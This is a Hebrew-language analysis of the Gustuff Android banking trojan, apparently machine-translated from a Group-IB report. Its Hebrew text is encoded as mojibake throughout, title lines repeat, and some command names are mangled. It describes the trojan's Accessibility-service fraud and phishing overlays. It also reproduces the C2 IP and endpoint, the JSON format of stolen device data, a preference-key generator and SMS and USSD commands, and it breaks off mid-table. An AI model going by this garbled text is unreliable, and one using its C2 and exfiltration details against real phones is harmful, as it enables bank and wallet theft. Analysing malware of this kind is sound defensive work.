ืื™ืš ื”-Android Trojan Gustuff ืžื—ืœื™ืง ืืช ื”ืฉืžื ืช (ืคื™ืื˜ ื•ืงืจื™ืคื˜ื•) ืžื”ื—ืฉื‘ื•ื ื•ืช ืฉืœืš

ืื™ืš ื”-Android Trojan Gustuff ืžื—ืœื™ืง ืืช ื”ืฉืžื ืช (ืคื™ืื˜ ื•ืงืจื™ืคื˜ื•) ืžื”ื—ืฉื‘ื•ื ื•ืช ืฉืœืš

ืจืง ืœืคื ื™ ื›ืžื” ื™ืžื™ื Group-IB ืžืขื•ื“ื›ืŸ ืขืœ ื”ืคืขื™ืœื•ืช ืฉืœ Android Trojan Gustuff ื”ื ื™ื™ื“. ื”ื•ื ืคื•ืขืœ ืืš ื•ืจืง ื‘ืฉื•ื•ืงื™ื ื‘ื™ื ืœืื•ืžื™ื™ื, ืชื•ืงืฃ ืœืงื•ื—ื•ืช ืฉืœ 100 ื”ื‘ื ืงื™ื ื”ื–ืจื™ื ื”ื’ื“ื•ืœื™ื ื‘ื™ื•ืชืจ, ืžืฉืชืžืฉื™ื ื‘ืืจื ืงื™ ืงืจื™ืคื˜ื• ื ื™ื™ื“ื™ื 32, ื›ืžื• ื’ื ืžืฉืื‘ื™ ืžืกื—ืจ ืืœืงื˜ืจื•ื ื™ ื’ื“ื•ืœื™ื. ืื‘ืœ ื”ืžืคืชื— ืฉืœ Gustuff ื”ื•ื ืคื•ืฉืข ืกื™ื™ื‘ืจ ื“ื•ื‘ืจ ืจื•ืกื™ืช ืชื—ืช ื”ื›ื™ื ื•ื™ Bestoffer. ืขื“ ืœืื—ืจื•ื ื”, ื”ื•ื ืฉื™ื‘ื— ืืช ื”ื˜ืจื•ื™ืื ื™ ืฉืœื• ื›"ืžื•ืฆืจ ืจืฆื™ื ื™ ืœืื ืฉื™ื ืขื ื™ื“ืข ื•ื ื™ืกื™ื•ืŸ".

ืžื•ืžื—ื” ืœื ื™ืชื•ื— ืงื•ื“ ื–ื“ื•ื ื™ ื‘-Group-IB ืื™ื‘ืŸ ืคื™ืกืจื‘ ื‘ืžื—ืงืจ ืฉืœื•, ื”ื•ื ืžื“ื‘ืจ ื‘ืคื™ืจื•ื˜ ืขืœ ืื™ืš Gustuff ืขื•ื‘ื“ ื•ืžื” ื”ืกื›ื ื•ืช ืฉืœื•.

ืื—ืจ ืžื™ ืžื—ืคืฉ ื’ื•ืกื˜ืืฃ?

Gustuff ืฉื™ื™ืš ืœื“ื•ืจ ื—ื“ืฉ ืฉืœ ืชื•ื›ื ื•ืช ื–ื“ื•ื ื™ื•ืช ืขื ืคื•ื ืงืฆื™ื•ืช ืื•ื˜ื•ืžื˜ื™ื•ืช ืœื—ืœื•ื˜ื™ืŸ. ืœื“ื‘ืจื™ ื”ืžืคืชื—, ื”ื˜ืจื•ื™ืื ื™ ื”ืคืš ืœื’ืจืกื” ื—ื“ืฉื” ื•ืžืฉื•ืคืจืช ืฉืœ ืชื•ื›ื ืช ื”ื–ื“ื•ื ื™ืช AndyBot, ืฉืžืื– ื ื•ื‘ืžื‘ืจ 2017 ืชื•ืงืคืช ื˜ืœืคื•ื ื™ื ืฉืœ ืื ื“ืจื•ืื™ื“ ื•ื’ื•ื ื‘ืช ื›ืกืฃ ื‘ืืžืฆืขื•ืช ื˜ืคืกื™ ืื™ื ื˜ืจื ื˜ ื“ื™ื•ื’ ื”ืžืชื—ื–ื” ืœื™ื™ืฉื•ืžื™ื ื ื™ื™ื“ื™ื ืฉืœ ื‘ื ืงื™ื ื•ืžืขืจื›ื•ืช ืชืฉืœื•ื ื‘ื™ื ืœืื•ืžื™ื•ืช ื™ื“ื•ืขื•ืช. ื‘ืกื˜ื•ืคืจ ื“ื™ื•ื•ื— ืฉืžื—ื™ืจ ื”ืฉื›ื™ืจื•ืช ืฉืœ Gustuff Bot ื”ื™ื” 800 ื“ื•ืœืจ ืœื—ื•ื“ืฉ.

ื ื™ืชื•ื— ืžื“ื’ื Gustuff ื”ืจืื” ื›ื™ ื”ื˜ืจื•ื™ืื ื™ ืขืฉื•ื™ ืœื”ืชืžืงื“ ื‘ืœืงื•ื—ื•ืช ื”ืžืฉืชืžืฉื™ื ื‘ื™ื™ืฉื•ืžื™ื ื ื™ื™ื“ื™ื ืฉืœ ื”ื‘ื ืงื™ื ื”ื’ื“ื•ืœื™ื ื‘ื™ื•ืชืจ, ื›ืžื• ื‘ื ืง ืื•ืฃ ืืžืจื™ืงื”, ื‘ื ืง ืกืงื•ื˜ืœื ื“, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, ื›ืžื• ื’ื ืืจื ืงื™ ืงืจื™ืคื˜ื•. ืืจื ืง ื‘ื™ื˜ืงื•ื™ืŸ, BitPay, Cryptopay, Coinbase ื•ื›ื•'.

ื ื•ืฆืจ ื‘ืžืงื•ืจ ื›ื˜ืจื•ื™ืื ื™ ื‘ื ืงืื™ ืงืœืืกื™, ื‘ื’ืจืกื” ื”ื ื•ื›ื—ื™ืช Gustuff ื”ืจื—ื™ื‘ ืžืฉืžืขื•ืชื™ืช ืืช ืจืฉื™ืžืช ื”ืžื˜ืจื•ืช ื”ืคื•ื˜ื ืฆื™ืืœื™ื•ืช ืœื”ืชืงืคื”. ื‘ื ื•ืกืฃ ืœื™ื™ืฉื•ืžื™ ืื ื“ืจื•ืื™ื“ ืœื‘ื ืงื™ื, ื—ื‘ืจื•ืช ืคื™ื ื˜ืง ื•ืฉื™ืจื•ืชื™ ืงืจื™ืคื˜ื•, Gustuff ืžื™ื•ืขื“ ืœืžืฉืชืžืฉื™ ืืคืœื™ืงืฆื™ื•ืช ืžืจืงื˜ืคืœื™ื™ืก, ื—ื ื•ื™ื•ืช ืžืงื•ื•ื ื•ืช, ืžืขืจื›ื•ืช ืชืฉืœื•ื ื•ืžืก'ืจื™ื ืžื™ื“ื™ื™ื. ื‘ืคืจื˜, PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut ื•ืื—ืจื™ื.

ื ืงื•ื“ืช ื›ื ื™ืกื”: ื—ื™ืฉื•ื‘ ืœื”ื“ื‘ืงื” ื”ืžื•ื ื™ืช

Gustuff ืžืื•ืคื™ื™ืŸ ื‘ื•ืงื˜ื•ืจ ื”"ืงืœืืกื™" ืฉืœ ื—ื“ื™ืจื” ืœืกืžืืจื˜ืคื•ื ื™ื ืฉืœ ืื ื“ืจื•ืื™ื“ ื‘ืืžืฆืขื•ืช ื“ื™ื•ื•ืจ SMS ืขื ืงื™ืฉื•ืจื™ื ืœ-APKs. ื›ืืฉืจ ืžื›ืฉื™ืจ ืื ื“ืจื•ืื™ื“ ื ื’ื•ืข ื‘ื˜ืจื•ื™ืื ื™ ื‘ืคืงื•ื“ืช ื”ืฉืจืช, Gustuff ืขืฉื•ื™ ืœื”ืชืคืฉื˜ ืขื•ื“ ื™ื•ืชืจ ื“ืจืš ืžืกื“ ื”ื ืชื•ื ื™ื ืฉืœ ืื ืฉื™ ื”ืงืฉืจ ืฉืœ ื”ื˜ืœืคื•ืŸ ื”ื ื’ื•ืข ืื• ื“ืจืš ืžืกื“ ื”ื ืชื•ื ื™ื ืฉืœ ื”ืฉืจืช. ื”ืคื•ื ืงืฆื™ื•ื ืœื™ื•ืช ืฉืœ Gustuff ืžื™ื•ืขื“ืช ืœื”ื“ื‘ืงื” ื”ืžื•ื ื™ืช ื•ืœื”ื™ื•ื•ืŸ ืžืจื‘ื™ ืฉืœ ื”ืขืกืง ืฉืœ ื”ืžืคืขื™ืœื™ื ืฉืœื” - ื™ืฉ ืœื” ืคื•ื ืงืฆื™ื™ืช "ืžื™ืœื•ื™ ืื•ื˜ื•ืžื˜ื™" ื™ื™ื—ื•ื“ื™ืช ืœื™ื™ืฉื•ืžื™ ื‘ื ืงืื•ืช ื ื™ื™ื“ื™ื ืœื’ื™ื˜ื™ืžื™ื™ื ื•ืืจื ืงื™ ืงืจื™ืคื˜ื•, ื”ืžืืคืฉืจืช ืœืš ืœื”ืื™ืฅ ื•ืœื”ื’ื“ื™ืœ ืืช ื’ื ื™ื‘ืช ื”ื›ืกืฃ.

ืžื—ืงืจ ืขืœ ื”ื˜ืจื•ื™ืื ื™ ื”ืจืื” ืฉืคื•ื ืงืฆื™ื™ืช ื”ืžื™ืœื•ื™ ื”ืื•ื˜ื•ืžื˜ื™ ื”ื•ื˜ืžืขื” ื‘ื• ื‘ืืžืฆืขื•ืช ืฉื™ืจื•ืช ื”ื ื’ื™ืฉื•ืช, ืฉื™ืจื•ืช ืœืื ืฉื™ื ืขื ืžื•ื’ื‘ืœื•ื™ื•ืช. Gustuff ืื™ื ื• ื”ื˜ืจื•ื™ืื ื™ ื”ืจืืฉื•ืŸ ืฉืขื•ืงืฃ ื‘ื”ืฆืœื—ื” ืืช ื”ื”ื’ื ื” ืžืคื ื™ ืื™ื ื˜ืจืืงืฆื™ื” ืขื ืจื›ื™ื‘ื™ ื—ืœื•ื ื•ืช ืฉืœ ื™ื™ืฉื•ืžื™ื ืื—ืจื™ื ื”ืžืฉืชืžืฉื™ื ื‘ืฉื™ืจื•ืช ืื ื“ืจื•ืื™ื“ ื–ื”. ืขื ื–ืืช, ื”ืฉื™ืžื•ืฉ ื‘ืฉื™ืจื•ืช ื ื’ื™ืฉื•ืช ื‘ืฉื™ืœื•ื‘ ืขื ืžื™ืœื•ื™ ืœืจื›ื‘ ื”ื•ื ืขื“ื™ื™ืŸ ื ื“ื™ืจ ืœืžื“ื™.

ืœืื—ืจ ื”ื”ื•ืจื“ื” ืœื˜ืœืคื•ืŸ ืฉืœ ื”ืงื•ืจื‘ืŸ, Gustuff, ื‘ืืžืฆืขื•ืช ืฉื™ืจื•ืช ื”ื ื’ื™ืฉื•ืช, ืžืกื•ื’ืœืช ืœื™ืฆื•ืจ ืื™ื ื˜ืจืืงืฆื™ื” ืขื ืจื›ื™ื‘ื™ ื—ืœื•ื ื•ืช ืฉืœ ื™ื™ืฉื•ืžื™ื ืื—ืจื™ื (ื‘ื ืงืื•ืช, ืžื˜ื‘ืขื•ืช ืงืจื™ืคื˜ื•ื’ืจืคื™ื™ื, ื›ืžื• ื’ื ื™ื™ืฉื•ืžื™ื ืœืงื ื™ื•ืช ืžืงื•ื•ื ื•ืช, ื”ื•ื“ืขื•ืช ื•ื›ื•'), ืœื‘ืฆืข ืืช ื”ืคืขื•ืœื•ืช ื”ื“ืจื•ืฉื•ืช ืœืชื•ืงืคื™ื . ืœื“ื•ื’ืžื”, ื‘ืคืงื•ื“ืช ื”ืฉืจืช, ืกื•ืก ื˜ืจื•ื™ืื ื™ ื™ื›ื•ืœ ืœืœื—ื•ืฅ ืขืœ ื›ืคืชื•ืจื™ื ื•ืœืฉื ื•ืช ืืช ื”ืขืจื›ื™ื ืฉืœ ืฉื“ื•ืช ื˜ืงืกื˜ ื‘ื™ื™ืฉื•ืžื™ ื‘ื ืงืื•ืช. ืฉื™ืžื•ืฉ ื‘ืžื ื’ื ื•ืŸ ืฉื™ืจื•ืช ื”ื ื’ื™ืฉื•ืช ืžืืคืฉืจ ืœืกื•ืก ื”ื˜ืจื•ื™ืื ื™ ืœืขืงื•ืฃ ืืช ืžื ื’ื ื•ื ื™ ื”ืื‘ื˜ื—ื” ื‘ื”ื ื”ืฉืชืžืฉื• ื”ื‘ื ืงื™ื ื›ื“ื™ ืœื”ืชืžื•ื“ื“ ืขื ืกื•ืกื™ื ื˜ืจื•ื™ืื ื™ื™ื ื ื™ื™ื“ื™ื ืžื”ื“ื•ืจ ื”ืงื•ื“ื, ื›ืžื• ื’ื ืฉื™ื ื•ื™ื™ื ื‘ืžื“ื™ื ื™ื•ืช ื”ืื‘ื˜ื—ื” ื”ืžื™ื•ืฉืžืช ืขืœ ื™ื“ื™ ื’ื•ื’ืœ ื‘ื’ืจืกืื•ืช ื—ื“ืฉื•ืช ืฉืœ ืžืขืจื›ืช ื”ื”ืคืขืœื” ืื ื“ืจื•ืื™ื“. ืœืคื™ื›ืš, Gustuff "ื™ื•ื“ืข ื›ื™ืฆื“" ืœื”ืฉื‘ื™ืช ืืช ื”ื’ื ืช Google Protect: ืœืคื™ ื”ืžื—ื‘ืจ, ืคื•ื ืงืฆื™ื” ื–ื• ืคื•ืขืœืช ื‘-70% ืžื”ืžืงืจื™ื.

ืื™ืš ื”-Android Trojan Gustuff ืžื—ืœื™ืง ืืช ื”ืฉืžื ืช (ืคื™ืื˜ ื•ืงืจื™ืคื˜ื•) ืžื”ื—ืฉื‘ื•ื ื•ืช ืฉืœืš

Gustuff ื™ื›ื•ืœ ื’ื ืœื”ืฆื™ื’ ื”ืชืจืื•ืช PUSH ืžื–ื•ื™ืคื•ืช ืขื ืกืžืœื™ื ืฉืœ ื™ื™ืฉื•ืžื™ื ืœื’ื™ื˜ื™ืžื™ื™ื ืœื ื™ื™ื“. ื”ืžืฉืชืžืฉ ืœื•ื—ืฅ ืขืœ ื”ื•ื“ืขืช ื”-PUSH ื•ืจื•ืื” ื—ืœื•ืŸ ืคื™ืฉื™ื ื’ ืฉื”ื•ื•ืจื“ ืžื”ืฉืจืช, ืฉื ื”ื•ื ืžื–ื™ืŸ ืืช ื ืชื•ื ื™ ื›ืจื˜ื™ืก ื”ื‘ื ืง ืื• ืืจื ืง ื”ืงืจื™ืคื˜ื• ื”ืžื‘ื•ืงืฉ. ื‘ืชืจื—ื™ืฉ ืื—ืจ ืฉืœ Gustuff, ื”ืืคืœื™ืงืฆื™ื” ืฉื‘ืฉืžื” ื”ื•ืฆื’ื” ื”ื•ื“ืขืช ื”-PUSH ื ืคืชื—ืช. ื‘ืžืงืจื” ื–ื”, ื”ืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช, ืขืœ ืคื™ ืคืงื•ื“ื” ืžื”ืฉืจืช ื“ืจืš ืฉื™ืจื•ืช ื”ื ื’ื™ืฉื•ืช, ื™ื›ื•ืœื” ืœืžืœื ืืช ืฉื“ื•ืช ื”ื˜ื•ืคืก ืฉืœ ื‘ืงืฉื” ื‘ื ืงืื™ืช ืœืขืกืงืช ื”ื•ื ืื”.

ื”ืคื•ื ืงืฆื™ื•ื ืœื™ื•ืช ืฉืœ Gustuff ื›ื•ืœืœืช ื’ื ืฉืœื™ื—ืช ืžื™ื“ืข ืขืœ ืžื›ืฉื™ืจ ื ื’ื•ืข ืœืฉืจืช, ื”ื™ื›ื•ืœืช ืœืงืจื•ื/ืœืฉืœื•ื— ื”ื•ื“ืขื•ืช SMS, ืฉืœื™ื—ืช ื‘ืงืฉื•ืช USSD, ื”ืคืขืœืช SOCKS5 Proxy, ืžืขืงื‘ ืื—ืจ ืงื™ืฉื•ืจ, ืฉืœื™ื—ืช ืงื‘ืฆื™ื (ื›ื•ืœืœ ืกืจื™ืงื•ืช ืชืžื•ื ื•ืช ืฉืœ ืžืกืžื›ื™ื, ืฆื™ืœื•ืžื™ ืžืกืš, ืฆื™ืœื•ืžื™ื) ืœ- ืฉืจืช, ืืคืก ืืช ื”ืžื›ืฉื™ืจ ืœื”ื’ื“ืจื•ืช ื”ื™ืฆืจืŸ.

ื ื™ืชื•ื— ืชื•ื›ื ื•ืช ื–ื“ื•ื ื™ื•ืช

ืœืคื ื™ ื”ืชืงื ืช ืืคืœื™ืงืฆื™ื” ื–ื“ื•ื ื™ืช, ืžืขืจื›ืช ื”ื”ืคืขืœื” ืื ื“ืจื•ืื™ื“ ืžืฆื™ื’ื” ืœืžืฉืชืžืฉ ื—ืœื•ืŸ ื”ืžื›ื™ืœ ืจืฉื™ืžื” ืฉืœ ื–ื›ื•ื™ื•ืช ืฉื‘ื™ืงืฉื• ืขืœ ื™ื“ื™ Gustuff:

ืื™ืš ื”-Android Trojan Gustuff ืžื—ืœื™ืง ืืช ื”ืฉืžื ืช (ืคื™ืื˜ ื•ืงืจื™ืคื˜ื•) ืžื”ื—ืฉื‘ื•ื ื•ืช ืฉืœืš
ื”ืืคืœื™ืงืฆื™ื” ืชื•ืชืงืŸ ืจืง ืœืื—ืจ ืงื‘ืœืช ื”ืกื›ืžืช ื”ืžืฉืชืžืฉ. ืœืื—ืจ ื”ืคืขืœืช ื”ืืคืœื™ืงืฆื™ื”, ื”ื˜ืจื•ื™ืื ื™ ื™ืจืื” ืœืžืฉืชืžืฉ ื—ืœื•ืŸ:

ืื™ืš ื”-Android Trojan Gustuff ืžื—ืœื™ืง ืืช ื”ืฉืžื ืช (ืคื™ืื˜ ื•ืงืจื™ืคื˜ื•) ืžื”ื—ืฉื‘ื•ื ื•ืช ืฉืœืš
ืœืื—ืจ ืžื›ืŸ ื”ื•ื ื™ืกื™ืจ ืืช ื”ืกืžืœ ืฉืœื•.

Gustuff ื ืืจื–, ืœื“ื‘ืจื™ ื”ืžื—ื‘ืจ, ืขืœ ื™ื“ื™ ืื•ืจื– ืž-FTT. ืœืื—ืจ ื”ื”ืคืขืœื”, ื”ื™ื™ืฉื•ื ื™ื•ืฆืจ ืžืขืช ืœืขืช ืงืฉืจ ืขื ืฉืจืช CnC ื›ื“ื™ ืœืงื‘ืœ ืคืงื•ื“ื•ืช. ืžืกืคืจ ืงื‘ืฆื™ื ืฉื‘ื“ืงื ื• ื”ืฉืชืžืฉื• ื‘ื›ืชื•ื‘ืช IP ื›ืฉืจืช ื”ื‘ืงืจื” 88.99.171[.]105 (ืœื”ืœืŸ ื ืกืžืŸ ืื•ืชื• ื› <%CnC%>).

ืœืื—ืจ ื”ื”ืฉืงื”, ื”ืชื•ื›ื ื™ืช ืžืชื—ื™ืœื” ืœืฉืœื•ื— ื”ื•ื“ืขื•ืช ืœืฉืจืช http://<%CnC%>/api/v1/get.php.

ื”ืชื’ื•ื‘ื” ืฆืคื•ื™ื” ืœื”ื™ื•ืช JSON ื‘ืคื•ืจืžื˜ ื”ื‘ื:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

ื‘ื›ืœ ืคืขื ืฉื ื™ื’ืฉื™ื ืœืืคืœื™ืงืฆื™ื”, ื”ื™ื ืฉื•ืœื—ืช ืžื™ื“ืข ืขืœ ื”ืžื›ืฉื™ืจ ื”ื ื’ื•ืข. ืคื•ืจืžื˜ ื”ื”ื•ื“ืขื” ืžื•ืฆื’ ืœื”ืœืŸ. ืจืื•ื™ ืœืฆื™ื™ืŸ ื›ื™ ื”ืฉื“ื•ืช ืžืœื, ื ื•ืกืฃ, ืืคืœื™ืงืฆื™ื•ืช ะธ ืจืฉื•ืช โ€“ ืื•ืคืฆื™ื•ื ืœื™ ื•ื™ื™ืฉืœื— ืจืง ื‘ืžืงืจื” ืฉืœ ืคืงื•ื“ืช ื‘ืงืฉื” ืž-CnC.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

ืื—ืกื•ืŸ ื ืชื•ื ื™ ืชืฆื•ืจื”

Gustuff ืžืื—ืกืŸ ืžื™ื“ืข ื—ืฉื•ื‘ ืžื‘ื—ื™ื ื” ืชืคืขื•ืœื™ืช ื‘ืงื•ื‘ืฅ ื”ืขื“ืคื•ืช. ืฉื ื”ืงื•ื‘ืฅ, ื›ืžื• ื’ื ืฉืžื•ืช ื”ืคืจืžื˜ืจื™ื ืฉื‘ื•, ื”ื ืชื•ืฆืื” ืฉืœ ื—ื™ืฉื•ื‘ ืกื›ื•ื MD5 ืžื”ืžื—ืจื•ื–ืช 15413090667214.6.1<%name%>ืื™ืคื” <%name%> - ืฉื-ืขืจืš ืจืืฉื•ื ื™. ืคืจืฉื ื•ืช ืคื™ื™ืชื•ืŸ ืœืคื•ื ืงืฆื™ื™ืช ื™ืฆื™ืจืช ื”ืฉื:

 nameGenerator(input):
    output = md5("15413090667214.6.1" + input) 

ื‘ื”ืžืฉืš ื ืกืžืŸ ืื•ืชื• ื› ืฉื ืžื—ื•ืœืœ (ืงืœื˜).
ืื– ืฉื ื”ืงื•ื‘ืฅ ื”ืจืืฉื•ืŸ ื”ื•ื: nameGenerator("API_SERVER_LIST"), ื”ื•ื ืžื›ื™ืœ ืขืจื›ื™ื ืขื ื”ืฉืžื•ืช ื”ื‘ืื™ื:

ืฉื ืžืฉืชื ื” ืขืจืš
nameGenerator("API_SERVER_LIST") ืžื›ื™ืœ ืจืฉื™ืžื” ืฉืœ ื›ืชื•ื‘ื•ืช CnC ื‘ืฆื•ืจื” ืฉืœ ืžืขืจืš.
nameGenerator("API_SERVER_URL") ืžื›ื™ืœ ืืช ื›ืชื•ื‘ืช ื”-CnC.
nameGenerator("SMS_UPLOAD") ื”ื“ื’ืœ ืžื•ื’ื“ืจ ื›ื‘ืจื™ืจืช ืžื—ื“ืœ. ืื ื”ื“ื’ืœ ืžื•ื’ื“ืจ, ืฉื•ืœื— ื”ื•ื“ืขื•ืช SMS ืœ-CnC.
nameGenerator("SMS_ROOT_NUMBER") ืžืกืคืจ ื˜ืœืคื•ืŸ ืฉืืœื™ื• ื™ื™ืฉืœื—ื• ื”ื•ื“ืขื•ืช SMS ืฉื™ืชืงื‘ืœื• ื‘ืžื›ืฉื™ืจ ื”ื ื’ื•ืข. ื‘ืจื™ืจืช ื”ืžื—ื“ืœ ื”ื™ื ืจื™ืง.
nameGenerator("SMS_ROOT_NUMBER_RESEND") ื”ื“ื’ืœ ื ืžื—ืง ื›ื‘ืจื™ืจืช ืžื—ื“ืœ. ืื ืžื•ืชืงืŸ, ื›ืืฉืจ ืžื›ืฉื™ืจ ื ื’ื•ืข ื™ืงื‘ืœ ื”ื•ื“ืขืช SMS, ื”ื•ื ื™ื™ืฉืœื— ืœืžืกืคืจ ื”ืฉื•ืจืฉ.
nameGenerator("DEFAULT_APP_SMS") ื”ื“ื’ืœ ื ืžื—ืง ื›ื‘ืจื™ืจืช ืžื—ื“ืœ. ืื ื“ื’ืœ ื–ื” ืžื•ื’ื“ืจ, ื”ืืคืœื™ืงืฆื™ื” ืชืขื‘ื“ ื”ื•ื“ืขื•ืช SMS ื ื›ื ืกื•ืช.
nameGenerator("DEFAULT_ADMIN") ื”ื“ื’ืœ ื ืžื—ืง ื›ื‘ืจื™ืจืช ืžื—ื“ืœ. ืื ื”ื“ื’ืœ ืžื•ื’ื“ืจ, ืœืืคืœื™ืงืฆื™ื” ื™ืฉ ื–ื›ื•ื™ื•ืช ืžื ื”ืœ.
nameGenerator("DEFAULT_ACCESSIBILITY") ื”ื“ื’ืœ ื ืžื—ืง ื›ื‘ืจื™ืจืช ืžื—ื“ืœ. ืื ื”ื“ื’ืœ ืžื•ื’ื“ืจ, ืฉื™ืจื•ืช ื”ืžืฉืชืžืฉ ื‘ืฉื™ืจื•ืช ื”ื ื’ื™ืฉื•ืช ืคื•ืขืœ.
nameGenerator("APPS_CONFIG") ืื•ื‘ื™ื™ืงื˜ JSON ื”ืžื›ื™ืœ ืจืฉื™ืžื” ืฉืœ ืคืขื•ืœื•ืช ืฉื™ืฉ ืœื‘ืฆืข ื›ืืฉืจ ืžื•ืคืขืœ ืื™ืจื•ืข ื ื’ื™ืฉื•ืช ื”ืžืฉื•ื™ืš ืœืืคืœื™ืงืฆื™ื” ืกืคืฆื™ืคื™ืช.
nameGenerator("APPS_INSTALLED") ืžืื—ืกืŸ ืจืฉื™ืžื” ืฉืœ ื™ื™ืฉื•ืžื™ื ื”ืžื•ืชืงื ื™ื ื‘ืžื›ืฉื™ืจ.
nameGenerator("IS_FIST_RUN") ื”ื“ื’ืœ ืžืชืืคืก ื‘ื”ืชื—ืœื” ื”ืจืืฉื•ื ื”.
nameGenerator("UNIQUE_ID") ืžื›ื™ืœ ืžื–ื”ื” ื™ื™ื—ื•ื“ื™. ื ื•ืฆืจ ื›ืืฉืจ ื”ื‘ื•ื˜ ืžื•ืคืขืœ ื‘ืคืขื ื”ืจืืฉื•ื ื”.

ืžื•ื“ื•ืœ ืœืขื™ื‘ื•ื“ ืคืงื•ื“ื•ืช ืžื”ืฉืจืช

ื”ืืคืœื™ืงืฆื™ื” ืžืื—ืกื ืช ืืช ื”ื›ืชื•ื‘ื•ืช ืฉืœ ืฉืจืชื™ CnC ื‘ืฆื•ืจื” ืฉืœ ืžืขืจืš ืžืงื•ื“ื“ ืขืœ ื™ื“ื™ ื‘ืกื™ืก ื‘ืกื™ืก ืฉื•ืจื•ืช. ื ื™ืชืŸ ืœืฉื ื•ืช ืืช ืจืฉื™ืžืช ืฉืจืชื™ ื”-CnC ืขื ืงื‘ืœืช ื”ืคืงื•ื“ื” ื”ืžืชืื™ืžื”, ื•ื‘ืžืงืจื” ื–ื” ื”ื›ืชื•ื‘ื•ืช ื™ืื•ื—ืกื ื• ื‘ืงื•ื‘ืฅ ื”ืขื“ืคื•ืช.

ื‘ืชื’ื•ื‘ื” ืœื‘ืงืฉื”, ื”ืฉืจืช ืฉื•ืœื— ืคืงื•ื“ื” ืœืืคืœื™ืงืฆื™ื”. ืจืื•ื™ ืœืฆื™ื™ืŸ ื›ื™ ืคืงื•ื“ื•ืช ื•ืคืจืžื˜ืจื™ื ืžื•ืฆื’ื™ื ื‘ืคื•ืจืžื˜ JSON. ื”ืืคืœื™ืงืฆื™ื” ื™ื›ื•ืœื” ืœืขื‘ื“ ืืช ื”ืคืงื•ื“ื•ืช ื”ื‘ืื•ืช:

ืงื‘ื•ืฆื” ืชื™ืื•ืจ
ืงื“ื™ืžื”ื”ืชื—ืœ ื”ืชื—ืœ ืœืฉืœื•ื— ื”ื•ื“ืขื•ืช SMS ืฉื”ืชืงื‘ืœื• ืขืœ ื™ื“ื™ ื”ืžื›ืฉื™ืจ ื”ื ื’ื•ืข ืœืฉืจืช CnC.
ืงื“ื™ืžื” ืขืฆื•ืจ ื”ืคืกืง ืœืฉืœื•ื— ื”ื•ื“ืขื•ืช SMS ืฉื”ืชืงื‘ืœื• ืขืœ ื™ื“ื™ ื”ืžื›ืฉื™ืจ ื”ื ื’ื•ืข ืœืฉืจืช CnC.
ussdRun ื‘ืฆืข ื‘ืงืฉืช USSD. ื”ืžืกืคืจ ืฉืืœื™ื• ืืชื” ืฆืจื™ืš ืœื‘ืฆืข ื‘ืงืฉืช USSD ื ืžืฆื ื‘ืฉื“ื” "ืžืกืคืจ" ืฉืœ JSON.
ืฉืœื— ืžืกืจื•ืŸ ืฉืœื— ื”ื•ื“ืขืช SMS ืื—ืช (ื‘ืžื™ื“ืช ื”ืฆื•ืจืš, ื”ื”ื•ื“ืขื” "ืžืคื•ืฆืœืช" ืœื—ืœืงื™ื). ื›ืคืจืžื˜ืจ, ื”ืคืงื•ื“ื” ืœื•ืงื—ืช ืื•ื‘ื™ื™ืงื˜ JSON ื”ืžื›ื™ืœ ืืช ื”ืฉื“ื•ืช "to" - ืžืกืคืจ ื”ื™ืขื“ ื•-"body" - ื’ื•ืฃ ื”ื”ื•ื“ืขื”.
sendSmsAb ืฉืœื— ื”ื•ื“ืขื•ืช SMS (ื‘ืžื™ื“ืช ื”ืฆื•ืจืš, ื”ื”ื•ื“ืขื” "ืžืคื•ืฆืœืช" ืœื—ืœืงื™ื) ืœื›ืœ ืžื™ ืฉื ืžืฆื ื‘ืจืฉื™ืžืช ืื ืฉื™ ื”ืงืฉืจ ืฉืœ ื”ืžื›ืฉื™ืจ ื”ื ื’ื•ืข. ื”ืžืจื•ื•ื— ื‘ื™ืŸ ืฉืœื™ื—ืช ื”ื•ื“ืขื•ืช ื”ื•ื 10 ืฉื ื™ื•ืช. ื’ื•ืฃ ื”ื”ื•ื“ืขื” ื ืžืฆื ื‘ืฉื“ื” JSON "body"
